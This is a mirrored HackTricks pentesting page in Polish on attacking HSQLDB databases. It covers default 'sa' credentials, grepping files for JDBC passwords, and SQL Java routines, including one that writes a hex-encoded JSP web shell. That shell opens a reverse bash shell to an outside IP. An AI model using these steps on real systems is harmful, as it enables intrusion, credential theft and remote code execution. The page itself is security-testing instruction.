mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 15:12:11 +00:00
94 lines
5.7 KiB
Markdown
94 lines
5.7 KiB
Markdown
<details>
|
|
|
|
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Inne sposoby wsparcia HackTricks:
|
|
|
|
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
|
|
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
|
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.
|
|
|
|
</details>
|
|
|
|
|
|
# Podstawowe informacje
|
|
|
|
**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** to wiodący system relacyjnej bazy danych SQL napisany w języku Java. Oferuje mały, szybki, wielowątkowy i transakcyjny silnik bazy danych z tabelami w pamięci i na dysku oraz obsługę trybów osadzonego i serwerowego.
|
|
|
|
**Domyślny port:** 9001
|
|
```text
|
|
9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
|
|
```
|
|
# Informacje
|
|
|
|
### Domyślne ustawienia
|
|
|
|
Należy pamiętać, że domyślnie usługa ta prawdopodobnie działa w pamięci lub jest powiązana z lokalnym hostem. Jeśli ją znalazłeś, prawdopodobnie wykorzystałeś inną usługę i szukasz podniesienia uprawnień.
|
|
|
|
Domyślne dane uwierzytelniające to zazwyczaj `sa` z pustym hasłem.
|
|
|
|
Jeśli wykorzystałeś inną usługę, wyszukaj możliwe dane uwierzytelniające, używając
|
|
```text
|
|
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
|
|
```
|
|
Zwróć uwagę na nazwę bazy danych - będziesz jej potrzebować do połączenia.
|
|
|
|
# Pozyskiwanie informacji
|
|
|
|
Połącz się z instancją bazy danych, pobierając [HSQLDB](https://sourceforge.net/projects/hsqldb/files/) i rozpakowując `hsqldb/lib/hsqldb.jar`. Uruchom aplikację GUI \(ble\) za pomocą polecenia `java -jar hsqldb.jar` i połącz się z instancją, używając odkrytych/słabych danych uwierzytelniających.
|
|
|
|
Zwróć uwagę, że adres URL połączenia będzie wyglądał mniej więcej tak dla zdalnego systemu: `jdbc:hsqldb:hsql://ip/DBNAME`.
|
|
|
|
# Sztuczki
|
|
|
|
## Rutyny języka Java
|
|
|
|
Możemy wywoływać statyczne metody klasy Java z HSQLDB za pomocą Rutyn Języka Java. Należy pamiętać, że wywoływana klasa musi znajdować się w ścieżce aplikacji.
|
|
|
|
Rutyny Języka Java mogą być `funkcjami` lub `procedurami`. Funkcje można wywoływać za pomocą instrukcji SQL, jeśli metoda Java zwraca jedną lub więcej zmiennych prymitywnych zgodnych z SQL. Są one wywoływane za pomocą instrukcji `VALUES`.
|
|
|
|
Jeśli metoda Java, którą chcemy wywołać, zwraca void, musimy użyć procedury wywołanej za pomocą instrukcji `CALL`.
|
|
|
|
## Odczytywanie właściwości systemowych Javy
|
|
|
|
Utwórz funkcję:
|
|
```text
|
|
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
|
|
DETERMINISTIC NO SQL
|
|
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
|
|
```
|
|
Wykonaj funkcję:
|
|
```text
|
|
VALUES(getsystemproperty('user.name'))
|
|
```
|
|
Możesz znaleźć [listę właściwości systemowych tutaj](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).
|
|
|
|
## Zapisz zawartość do pliku
|
|
|
|
Możesz użyć narzędzia `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` w Javie, które znajduje się w JDK (automatycznie ładowane do ścieżki klasy aplikacji), aby zapisywać elementy zakodowane w formacie szesnastkowym na dysku za pomocą niestandardowej procedury. **Zwróć uwagę na maksymalny rozmiar 1024 bajtów**.
|
|
|
|
Utwórz procedurę:
|
|
```text
|
|
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
|
|
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
|
|
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
|
|
```
|
|
Wykonaj procedurę:
|
|
```text
|
|
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
|
|
```
|
|
<details>
|
|
|
|
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Inne sposoby wsparcia HackTricks:
|
|
|
|
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
|
|
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
|
|
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.
|
|
|
|
</details>
|